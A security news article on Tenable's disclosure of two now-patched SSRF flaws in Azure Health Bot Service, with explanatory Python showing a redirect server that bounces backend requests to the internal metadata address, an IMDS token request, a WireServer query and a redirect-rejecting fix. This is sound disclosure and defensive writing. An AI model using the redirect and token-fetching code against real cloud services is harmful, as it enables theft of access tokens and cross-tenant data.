Tenable Research has disclosed two vulnerabilities in the Azure Health Bot Service that could be exploited to gain access to cross-tenant resources such as user and client data.
The Azure Health Bot Service is a cloud-based platform built for healthcare use. Developers can use Azure Health Bot to build and deploy AI-driven, HIPAA-compliant conversational virtual assistants that improve efficiency and reduce costs. These virtual assistants can be tailored to specific healthcare needs and can handle administrative tasks or even triage to lighten the workload on staff.
Depending on how these chatbots are configured, they may have access to sensitive patient data, so any vulnerabilities could put that data at risk; vulnerabilities could also potentially be exploited to reach other resources. Tenable researchers reviewed the Azure Health Bot Service for potential security issues, and one of the features they examined was the Data Connections element. Data Connections allow chatbots to connect to and pull information from external sources, such as patient portals for retrieving patient data and reference databases for general medical information.
This feature allows the service's backend to make requests to third-party APIs. The researchers examined it to see whether it could be made to reach endpoints internal to the service. Microsoft had put safeguards in place to prevent this, but the researchers were able to bypass those mitigations by issuing redirect responses from endpoints under their control.
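To make the bypass concrete, here is a minimal, illustrative sketch of the general redirect-based SSRF technique, not Tenable's actual proof of concept: an attacker registers a URL they control as a data connection endpoint, the URL passes validation because it points at an external host, and the attacker's server then answers the backend's request with a redirect to an internal address. The port and target URL below are assumptions for illustration only.

```python
# Minimal sketch of a redirect-based SSRF bypass (illustrative only).
# The attacker-controlled URL passes validation as an "external" host,
# but when the backend fetches it, the server answers with a redirect
# to an internal-only address (here, the Azure IMDS endpoint).
from http.server import BaseHTTPRequestHandler, HTTPServer

# Internal target the backend would be redirected to (assumed for illustration).
INTERNAL_TARGET = "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every request with a 302 pointing at the internal address.
        # If the backend's HTTP client follows redirects, it fetches the
        # internal URL on the attacker's behalf.
        self.send_response(302)
        self.send_header("Location", INTERNAL_TARGET)
        self.end_headers()

if __name__ == "__main__":
    # http://<this-host>:8080/ is what would be supplied as the
    # seemingly harmless external data connection endpoint.
    HTTPServer(("0.0.0.0", 8080), RedirectHandler).serve_forever()
```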
The first vulnerability, CVE-2024-38109 (CVSS score 9.1), is a critical server-side request forgery (SSRF) flaw that could be exploited by an authenticated threat actor to elevate privileges. The researchers showed that it was possible to reach the service's Instance Metadata Service (IMDS) and obtain access tokens permitting management of cross-tenant resources belonging to other customers of the Health Bot service.
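For context, Azure's IMDS exposes a documented token endpoint that returns OAuth access tokens for the managed identity attached to the underlying compute. Tenable's exact requests are not published, but a standard IMDS token call looks like the sketch below; an SSRF that can reach this endpoint with the required header may be able to obtain such a token.

```python
# Illustration of Azure's documented IMDS token endpoint (only reachable
# from inside Azure compute). The token's scope depends on the roles
# assigned to the managed identity behind it.
import json
import urllib.request

IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

req = urllib.request.Request(IMDS_TOKEN_URL, headers={"Metadata": "true"})
with urllib.request.urlopen(req) as resp:
    token = json.load(resp)["access_token"]
    # The token can then be presented to Azure Resource Manager APIs.
    print(token[:40], "...")
```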
The second vulnerability was found in the validation mechanism for FHIR data connection endpoints used within Azure Health Bot. These endpoints likewise mishandled redirect responses from user-supplied endpoints. The researchers exploited the flaw to gain access to Azure's WireServer and parts of the internal Azure Kubernetes Service (AKS) infrastructure.
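For reference, WireServer is an Azure platform service reachable from inside a VM or container host at the well-known address 168.63.129.16. The sketch below shows a benign request to its documented version-listing endpoint, purely to illustrate the kind of internal surface an SSRF of this sort exposes; it is not Tenable's exploit.

```python
# Illustration only: query WireServer's version-listing endpoint from
# inside Azure compute. An SSRF that can reach 168.63.129.16 can hit the
# same surface, which also serves the VM guest agent's goal state.
import urllib.request

WIRESERVER_VERSIONS = "http://168.63.129.16/?comp=versions"

with urllib.request.urlopen(WIRESERVER_VERSIONS) as resp:
    print(resp.read().decode())  # XML list of supported WireServer API versions
```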
Microsoft was notified of the two vulnerabilities and fixed both within a week by ensuring that redirect status codes are rejected for data connection endpoints. Customers of the Azure Health Bot Service do not need to take any action. According to Microsoft, there is no evidence the vulnerabilities have been exploited in the wild.
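The fix belongs to a well-understood class of SSRF defenses: when fetching a user-supplied URL, do not follow redirects automatically and treat any 3xx response as an error. The sketch below shows that pattern with a hypothetical fetch_data_connection helper; it is not Microsoft's actual implementation.

```python
# Minimal sketch of the mitigation class (not Microsoft's implementation):
# fetch a user-supplied endpoint without following redirects and reject
# any 3xx response outright, so the client never chases a Location header
# into an internal address.
import requests  # third-party: pip install requests

def fetch_data_connection(url: str, timeout: float = 5.0) -> bytes:
    resp = requests.get(url, allow_redirects=False, timeout=timeout)
    if 300 <= resp.status_code < 400:
        raise ValueError(f"redirect responses are not allowed: {resp.status_code}")
    resp.raise_for_status()
    return resp.content
```

A fuller defense would also resolve the supplied hostname and block link-local and private address ranges before connecting.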
Tenable notes that these vulnerabilities are not in the AI models themselves but in the underlying AI chatbot infrastructure, and says the smart way to protect the AI attack surface is to focus on standard, foundational cyber hygiene and proven practices, such as applying conventional web application and cloud security controls to AI-powered resources.